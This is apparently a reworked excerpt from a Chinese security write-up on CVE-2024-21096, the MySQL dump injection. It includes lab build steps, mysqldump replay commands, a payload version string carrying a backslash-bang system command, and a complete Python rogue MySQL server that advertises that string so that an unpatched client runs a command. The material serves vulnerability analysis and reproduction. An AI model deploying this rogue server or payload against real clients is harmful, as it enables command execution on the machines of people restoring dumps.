# Dump one database to a file, then replay that file through the mysql client.
# Long-option spelling is equivalent to the original -u/-p; a bare --password
# (like a bare -p) prompts for the password instead of taking it from argv.
# NOTE(review): the replay step is the dangerous half on an unpatched client.
# The payload shown on this page is a server-controlled version string carrying
# a backslash-bang system command; once mysqldump copies that string into the
# dump, feeding the dump to `mysql` is what runs it. Inspect dumps taken from
# servers you do not control before replaying them.
mysqldump --user=username --password database_name > dumpfile.sql
mysql --user=username --password database_name < /path/to/dumpfile.sql
- 通过 SERVER_VERSION_LENGTH 宏定义的 60 个字符上限限制版本信息的长度;
- 检查版本信息中是否存在非法字符(即非字母、数字或标点符号的字符),如果存在则丢弃这些非法字符后再返回版本信息。
8.0.0-injection_testn\! touch /tmp/xxx
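# Build a deliberately unpatched MySQL 8.0.34 from source to reproduce the
# server-version injection this page analyses (CVE-2024-21096). This build is
# for the lab only; do not reuse it anywhere else.
#
# Changes from the original listing: stop on the first failure so that
# `sudo make install` never runs on a half-built or wrong directory (a failed
# wget previously cascaded into tar/cd errors while cmake and make still ran),
# print the tarball checksum so it can be compared with the value Oracle
# publishes for this file (the download is authenticated by TLS only), and
# use `mkdir -p` so the script also works on a second run.
set -euo pipefail

sudo apt-get update
sudo apt-get install build-essential cmake libncurses5-dev bison libssl-dev pkg-config
wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.34.tar.gz
# Compare this against the SHA-256 published on dev.mysql.com before building.
sha256sum mysql-8.0.34.tar.gz
tar xzvf mysql-8.0.34.tar.gz
cd mysql-8.0.34
mkdir -p build
cd build
# -DWITH_BOOST=.. resolves to the source root; presumably that is where
# -DDOWNLOAD_BOOST=1 places the fetched Boost tree (verify if cmake complains).
cmake .. -DDOWNLOAD_BOOST=1 -DWITH_BOOST=..
make -j"$(nproc)"
sudo make install
# --initialize creates the data directory. It assumes a `mysql` system user
# already exists and, per MySQL's usual behaviour, prints a temporary root
# password to its log/stderr — capture it, it is needed for the first login.
sudo /usr/local/mysql/bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data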
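# Dump the `mysql` system database from the lab host (prompts for repoog's
# password because -p is given without a value).
mysqldump -h 192.168.2.217 -urepoog -p mysql
# Copy database pwndb into pwndb_imp on the same host by piping mysqldump
# straight into the mysql client. The original listing spelled the client
# `msyql`, which fails with "command not found" and silently discards the dump.
# NOTE(review): this pipe is exactly the pattern the page analyses — whatever
# the server puts in its version string ends up in the dump, and an unpatched
# client on the right-hand side interprets a backslash-bang sequence in it as
# a system command, so only do this against a server you trust or a patched
# client. Both tools use a bare -p and will each prompt on the terminal; a
# login path (mysql_config_editor) or an option file avoids the competing
# prompts.
mysqldump -h 192.168.2.217 -urepoog -p pwndb | mysql -h 192.168.2.217 -urepoog -p pwndb_imp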
import logging
import asyncio
from sqlglot.executor import execute
from mysql_mimic import MysqlServer, Session
from mysql_mimic.variables import GlobalVariables
# Catalogue the rogue server advertises: one database ``test`` holding a single
# table ``x`` whose only column ``a`` is an INT. Passed to sqlglot's executor
# as the schema for every incoming query.
SCHEMA = {"test": {"x": {"a": "INT"}}}
# Rows backing SCHEMA: test.x contains three rows with a = 1, 2, 3. These are
# the only data the rogue server ever returns.
TABLES = {"test": {"x": [{"a": value} for value in (1, 2, 3)]}}
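class MyVariables(GlobalVariables):
    """Global variables of the rogue server with a weaponised ``version``.

    The value set here is what the server reports as its version. It carries
    the injection this page analyses: text that, once mysqldump copies it
    into a dump, an unpatched ``mysql`` client reads as its backslash-bang
    (``\\!``) system-command escape — here launching ``gnome-calculator`` as
    a visible proof of execution.
    """

    def __init__(self) -> None:
        super().__init__()
        # Raw string: the original ``"...\\! ..."`` relied on Python leaving
        # an unknown escape sequence untouched, which is a SyntaxWarning on
        # 3.12+ and fragile to edit. ``r"..."`` produces the identical bytes
        # (the backslash and ``!`` both stay literal).
        # The third argument is passed through exactly as in the original;
        # presumably GlobalVariables' "force"/settable flag — verify.
        self.set("version", r"8.0.0-injection-testn\! gnome-calculator", True)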
class MySession(Session):
    """Per-connection session of the rogue server.

    Installs the weaponised global variables, answers every query from the
    in-memory SCHEMA/TABLES through sqlglot's executor, and reports ``8.1.1``
    for the ``VERSION()`` SQL function. Note that this SQL-function value and
    the global ``version`` variable differ; which of the two a connecting
    client records is not visible from here.
    """

    def __init__(self) -> None:
        super().__init__()
        self.variables = MyVariables()
        # ``_functions`` is a private attribute of mysql_mimic's Session; the
        # value is a plain string, not a callable, as in the original.
        self._functions["VERSION"] = "8.1.1"

    async def query(self, expression, sql, attrs):
        """Run ``expression`` against the static tables.

        ``sql`` and ``attrs`` are accepted for interface compatibility and
        ignored. Returns ``(rows, columns)`` as produced by sqlglot.
        """
        outcome = execute(expression, schema=SCHEMA, tables=TABLES)
        rows, columns = outcome.rows, outcome.columns
        return rows, columns

    async def schema(self):
        """Expose the static catalogue (the same SCHEMA object, not a copy)."""
        return SCHEMA
async def main() -> None:
    """Start the rogue MySQL server and serve until cancelled.

    DEBUG logging exposes mysql-mimic's protocol traffic, which is useful in
    the lab but may also write connecting clients' handshake data to the log;
    keep it lab-only. Bind address, port and authentication are whatever
    ``MysqlServer`` defaults to (not visible here) — confirm before exposing.
    """
    logging.basicConfig(level=logging.DEBUG)
    rogue = MysqlServer(session_factory=MySession)
    await rogue.serve_forever()
# Script entry point: run the server's event loop until interrupted.
if __name__ == "__main__":
    asyncio.run(main())
原文始发于微信公众号(洞源实验室):CVE-2024-21096:MySQLDump提权漏洞分析